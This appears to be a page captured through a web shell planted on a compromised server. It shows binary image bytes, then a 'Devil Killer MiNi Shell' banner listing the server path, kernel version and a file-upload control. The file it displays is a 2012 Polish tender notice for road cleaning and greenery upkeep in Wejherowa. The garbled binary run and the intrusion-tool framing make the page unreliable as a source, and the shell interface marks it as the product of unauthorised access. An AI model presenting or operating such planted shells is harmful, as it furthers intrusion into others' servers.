JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120420/126602-N-2012.html

<p class="kh_header"><b>Puck: Utrzymanie dróg powiatowych miejskich na terenie miasta Wejherowa</b><br>
<b>Numer ogłoszenia: 126602 - 2012; data zamieszczenia: 20.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Drogowy dla Powiatu Puckiego i Wejherowskiego z siedzibą w Pucku , ul. Elizy Orzeszkowej 5, 84-100 Puck, woj. pomorskie, tel. 058 7743280, faks 058 7743293.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zd.puck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie dróg powiatowych miejskich na terenie miasta Wejherowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac:
I. Utrzymanie czystości w pasach drogowych dróg powiatowych miejskich na terenie miasta Wejherowa
II. Pielęgnacja zieleni w pasach drogowych dróg powiatowych miejskich na terenie miasta Wejherowa.
Przedmiotem zamówienia jest utrzymanie czystości oraz pielęgnacja zieleni w pasach drogowych dróg powiatowych miejskich na terenie miasta Wejherowa, polegające na:
- utrzymaniu czystości na całej szerokości pasa drogowego dróg powiatowych,
z wyłączeniem chodników bezpośrednio przyległych do posesji.
Zakres rzeczowy utrzymania czystości obejmuje:	
I. Utrzymanie w ciągłej czystości całą powierzchnię nawierzchni jezdni, opasek bezpieczeństwa, chodników, ciągów pieszych, azyli dla pieszych, ścieżek rowerowych, schodów, miejsc postojowych, zatok postojowych i autobusowych, barier ochronnych ustawionych w pasie drogowym oraz terenów zielonych znajdujących się w pasach drogowych dróg powiatowych powierzonych do utrzymania poprzez:	
1. Systematyczne oczyszczenie wyżej wyszczególnionych elementów pasa drogowego przy użyciu specjalistycznego sprzętu lub ręcznie, w miejscach gdzie oczyszczenie mechaniczne nie jest możliwe oraz systematyczne zbieranie zanieczyszczeń - w systemie ciągłym, codziennie i bez dodatkowego powiadamiania o takiej potrzebie przez Zamawiającego.
Ww. czynności polegać będą na:
a. bieżącym usuwaniu zalegającego piasku, błota, liści, zanieczyszczeń	nieorganicznych, załadunku odpadów bezpośrednio po zakończeniu prac;
b. bieżącym zbieraniu zanieczyszczeń ( w tym papierów, folii, butelek, puszek, brył	gruzu, betonu, gałęzi liści odpadów organicznych, oleju, niedopałków, szkła	opakowań z tworzyw sztucznych, elementów zgubionych przez pojazdy i innych)
c. codzienne opróżnienie koszy i czyszczenie koszy ulicznych ustawionych w pasach
drogowych powierzonych do utrzymania wraz z wywozem nieczystości, według
potrzeb lecz bez dodatkowego powiadamiania o takiej konieczności przez
Zamawiającego. W przypadku stwierdzenia zanieczyszczeń wokół koszy ulicznych i
innych pojemników na odpady ustawionych w a pasach drogowych, należy uprzątnąć
teren w promieniu do 5 m od pojemnika; Zamawiający zobowiązuje Wykonawcę do
zgłaszania Zamawiającemu informacji o skradzionych lub zniszczonych koszach na
odpady i ustawienia koszy przewróconych lub przestawionych;	
d. sprzątanie chodników obejmuje całą powierzchnię z wyłączeniem powierzchni	przylegających bezpośrednio do posesji;	
e. sprzątanie nawierzchni jezdni obejmuje całą powierzchnię wraz z azylami  dla	pieszych w pasie drogi.	
2. Zbieranie z terenu objętego zamówieniem padłych zwierząt (dzikich i udomowionych), padłych ptaków (dzikich i udomowionych), odpadów pochodzenia zwierzęcego, porzuconej żywności wraz z ich wywozem do miejsca utylizacji.	
3. Systematyczne kompleksowe oczyszczenie krat wpustów ulicznych znajdujących się w ciągach dróg z częstotliwością uniemożliwiającą zapychanie odpływu wód opadowych, zobowiązuje Wykonawcę do prowadzenia  prac związanych z oczyszczeniem elementów pasa drogowego z należytą starannością i przy jednoczesnym zapobieganiu zapychania się elementów odwodnienia ulic piaskiem, trawą liśćmi, papierami i innymi odpadami powstającymi w trakcie świadczenia usługi utrzymania czystości.	
4. Usuwaniu skutków kolizji drogowych (z wyjątkiem usuwania substancji niebezpiecznych, ropopochodnych) oraz innych prac porządkowych koniecznych do wykonania w trybie pilnym. Prace te należy rozpocząć nie później niż w ciągu 2 godzin od chwili ich zgłoszenia przez Zamawiającego lub inne jednostki ratunkowe. Działania te dotyczą całej doby.	
5. Wywóz i utylizacje odpadów powstałych przy prowadzonych pracach. 	
Zakres rzeczowy pielęgnacji zieleni obejmuje:	 
II. Pielęgnację zieleni w ciągu dróg powiatowych na terenie miasta Wejherowa poprzez:
1. Koszenie trawników, zbieranie i wywóz ściętej trawy, załadunku odpadów bezpośrednio po zakończeniu prac, transporcie i utylizacji odpadów.	
2. Obcinanie odrostów wokół drzew, krzewów, żywopłotów.	
3. Okopywanie trawników przy krawężnikach.	
4. Pielęgnacja drzew poprzez odchwaszczanie wraz ze spulchnianiem gleby, nawożenie podwiązanych młodych drzew, usuwanie odrostów.	
5. Pielęgnacja krzewów i żywopłotów poprzez odchwaszczenie wraz ze spulchnieniem gleby, nawożenie, opryski, cięcia formujące krzewów i żywopłotów.	
6. Wygrabianie trawników i zieleńców szczególnie w okresie jesiennym, po opadnięciu liści z drzew.	
7.  Usuwanie chwastów z utwardzonych części pasa drogowego, uniemożliwiającej zarastanie powierzchni, opasek bezpieczeństwa, parkingów, ciągów pieszych, ścieżek rowerowych, zatok autobusowych, postojowych, azyli dla pieszych. Ww. czynności należy wykonać ręcznie. Dopuszcza się chemicznie usuwanie chwastów po dopełnieniu wszelkich formalności wynikających z właściwych przepisów. Wszelkie koszty związane z akcją informacyjną, dokonaniem stosownych uzgodnień oraz wykonaniem oprysków obciążają Wykonawcę.  Wykonawca zobowiązany jest do używania materiałów posiadających odpowiednie atesty lub normy branżowe oraz do okazywania na żądanie Zamawiającego, w stosunku do wskazanych materiałów, certyfikatów na znak bezpieczeństwa lub deklaracji zgodności z właściwą normą.  Wszelkie prace z zastosowaniem środków chemicznych należy prowadzić z zachowaniem wszystkich wymogów z zakresu BHP i w sposób gwarantujący należyte wykonanie prac. Wykonawca jest zobowiązany do tego, aby wszyscy pracownicy wykonujący prace posiadali odpowiednie kwalifikacje do wykonywanych przez siebie prac oraz byli wyposażeni w wymaganą odrębnymi przepisami odzież ochronną.	
8. Wywóz odpadów powstałych przy prowadzonych pracach.	
9. Intensywność prac związanych z pielęgnacją zieleni w pasach drogowych należy dostosować do istniejących potrzeb w taki sposób, aby zapewnić wysoki standard czystości i estetyki.	
Obowiązki Wykonawcy:	
1. Przeprowadzenie wizji w terenie. Dokonanie obmiaru poszczególnych elementów oraz przedłożyć ofertę na wykonanie usług.
2. Udział w organizowanych przez zamawiającego objazdach mających na celu ocenę potrzeb oraz kontrolę realizacji zamówienia.	
3. Ubezpieczenie robót, przy czym ubezpieczeniu podlegać będzie w szczególności odpowiedzialność cywilna za szkody oraz następstwa powstałe z winy Wykonawcy i jego pracowników w trakcie prowadzenia robót oraz w następstwie nieszczęśliwych wypadków, dotyczących pracowników Wykonawcy, osób trzecich, powstałe w związku z prowadzonymi robotami, w tym także z ruchem pojazdów mechanicznych. Wykonawca ponosi wszelkie skutki finansowe i prawne za ewentualne szkody wyrządzone w trakcie realizacji zamówienia.
4. Należyta organizacja wykonywanych robót, w celu zmniejszenia uciążliwości dla użytkowników dróg i mieszkańców, do minimalizacji utrudnień z tytułu prowadzonych robót oraz zapewnienia bezpieczeństwa ruchu do drodze w trakcie trwania prac.		
5. Wywóz i utylizacja odpadów może być wykonywana dowolnymi środkami transportowymi we własnym zakresie, na własny koszt bezpośrednio po zakończeniu prac w tym padłych zwierząt, ptaków, odpadów pochodzenia zwierzęcego, porzuconej żywności. Środki transportu muszą uniemożliwiać wtórne zanieczyszczenie środowiska i spełniać wymogi ochrony środowiska i przepisy sanitarne. Utylizacja śmieci powinna być zgodna z przepisami ochrony środowiska.	 
6. Zastosowanie do robót sprzętu sprawnego technicznie w ilości gwarantującej należyte wykonanie prac, gwarantującego zachowanie wymagań jakościowych i bezpieczeństwa. Zastosowany sprzęt nie może powodować uszkodzeń jezdni lub chodnika, ani innych elementów objętych utrzymaniem czystości. 	
7 Używanie do wykonania prac pojazdów samochodowych wyposażonych w ostrzegawczy sygnał świetlny błyskowy barwy żółtej samochodowej, zgodnie z ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym Dz. U. Z 2005 r. Nr 108 poz. 908.
8. Przestrzeganie przepisów bezpieczeństwa i higieny pracy. 	
Wymagania Zamawiającego:	
1.Wykonawca winien posiadać:	
- uprawnienia do wykonywania czynności polegających na pielęgnacji zieleni
tzw. 	Gospodarza Zieleni;	
- niezbędną wiedzę i doświadczenie w szczególności jedną usługę polegająca	pielęgnacji     zieleni;		 
- potencjał techniczny i zdolność do wykonania przedmiotu zamówienia,
w szczególności dysponować urządzeniami technicznymi tj. dwie zamiatarki uliczne samochodowa i ciągnikowa do zamiatania mechanicznego ulic i chodników, ciągnik 	z przyczepą, kosiarką samojezdną, kosiarki, spycharko-ładowarka, wykaszarka, środki transportu o ładowności 0,9 t, piły spalinowe, nożyce do cięcia żywopłotów, samochód przystosowany do wywozu odpadów 	
  - potencjał osobowy w ilości 5 osób, w tym jedna osoba posiadająca uprawnienia gospodarza zieleni 
2. Wykonawca sporządzi projekt organizacji ruchu na czas prowadzenia robót w pasach drogowych i jej wprowadzenie w trakcie realizacji zamówienia. Wykonawca ponosi pełną odpowiedzialność za oznakowanie i zabezpieczenie robót wykonywanych w pasie drogowym pod ruchem. Oznakowanie drogi, pojazdów, maszyn i urządzeń w miejscach wykonywanych robót winno być zgodne z zatwierdzonym projektem opracowanym staraniem i na własny koszt Wykonawcy.	 	
3. Prace objęte zamówieniem nie mogą powodować zagrożenia bezpieczeństwa i nadmiernych uciążliwości ruchu pojazdów i pieszych.	 
4. Usuwanie liści w okresie jesiennym tj. w miesiącach Październik, Listopad będzie wykonywane z częstotliwością nie mniejszą niż jeden raz na dwa tygodnie lub na telefoniczny wniosek Zamawiającego.	
5. Oczyszczanie krat wpustów ulicznych będzie wykonane dwukrotnie w czasie obejmującym zamówienie. W przypadku konieczności pracę należy powtórzyć.	
6. Intensywność prac związanych z utrzymaniem czystości i porządku oraz pielęgnacją zieleni w pasach drogowych należy dostosować do istniejących potrzeb w taki sposób, aby zapewnić wysoki standard czystości i estetyki.	
7.  Ilość wykonywanych prac związanych z pielęgnacją zieleni:	
1. Koszenie trawników, zbieranie i wywóz ściętej trawy, załadunku odpadów	bezpośrednio po zakończeniu prac, transporcie i utylizacji odpadów - nie mniej niż
 jeden raz w miesiącu;	
2. Obcinanie odrostów wokół drzew, krzewów, żywopłotów - nie mniej niż 2 razy w
okresie realizacji zadań;	
3. Okopywanie trawników przy krawężnikach - nie mniej niż dwa razy okresie 	realizacji  zadań;	
4. Pielęgnacja drzew poprzez odchwaszczanie wraz ze spulchnianiem gleby, 	nawożenie podwiązanych młodych drzew, usuwanie odrostów - 	nie mniej niż dwa 	razy okresie realizacji zadań;	
5. Pielęgnacja krzewów i żywopłotów poprzez odchwaszczenie wraz ze spulchnieniem gleby, nawożenie, opryski, cięcia formujące krzewów i żywopłotów - nie mniej niż 	dwa razy okresie realizacji zadań;	
6. Wygrabianie trawników i zieleńców (szczególnie w okresie jesiennym, po 	opadnięciu liści z drzew) - nie mniej niż jeden raz w miesiącu;	
7.  Usuwanie chwastów z utwardzonych części pasa drogowego, uniemożliwiającej 	zarastanie powierzchni, opasek bezpieczeństwa, parkingów, ciągów pieszych, ścieżek rowerowych, zatok autobusowych, postojowych, azyli dla pieszych - nie mniej niż
dwa razy okresie realizacji zadań;	
8. Wywóz odpadów powstałych przy prowadzonych pracach - bezpośrednio po 	zakończeniu prac.	
8. Wykonawca wraz z Zamawiającym dokona przeglądu wykonanych robót w minionym okresie w połowie miesiąca tj. 15-go dnia każdego miesiąca. W terminie do 5-go dnia każdego miesiąca dokona odbioru częściowego wykonanych robót za miniony miesiąc.
W przypadku braku możliwości dokonania odbioru w ww terminu dopuszcza się przesunięcie  i dokonanie odbioru częściowego nie później niż na 3 dni od ustalonego terminu.
Z przeprowadzonego odbioru zostanie sporządzony protokół, który podpisują przedstawiciele Zamawiającego i Wykonawcy. Protokół odbioru stanowi podstawę do wystawienia faktury za dany miesiąc.	
9. Termin realizacji zamówienia obejmuje od daty podpisania umowy do 21.12.2012 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.13.00-5, 77.31.41.00-5, 77.31.20.00-0, 90.61.20.00-0, 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający wymaga wniesienia wadium
2.  Ustala się wadium w wysokości: 2.000,00 zł słownie: dwa tysiące zł 00/100
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy: 
61834900020040152020000040 z adnotacją: wadium - utrzymanie dróg powiatowych miejskich na terenie miasta Wejherowa 
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz. 275 
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się doświadczeniem w wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na utrzymaniu czystości i zieleni o wartości min. 100.000,00 zł /brutto/. Należy załączyć dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie.  
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że dysponuje lub będzie dysponować następującymi narzędziami i urządzeniami niezbędnymi do wykonania zamówienia:                  
- 2 zamiatarki uliczne: samochodowa i ciągnikowa do zamiatania mechanicznego ulic  i chodników, ciągnik z przyczepą, kosiarka samojezdna, kosiarki, spycharko-ładowarka, wykaszarka, środki transportu o ładowności 0,9 t, piły spalinowe, nożyce do cięcia żywopłotów, samochód przystosowany do wywozu odpadów.
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że dysponuje lub będzie dysponować   5 osobowym zespołem pracowników, w tym jedną osobą posiadającą uprawnienia gospodarza zieleni.
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia.
Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
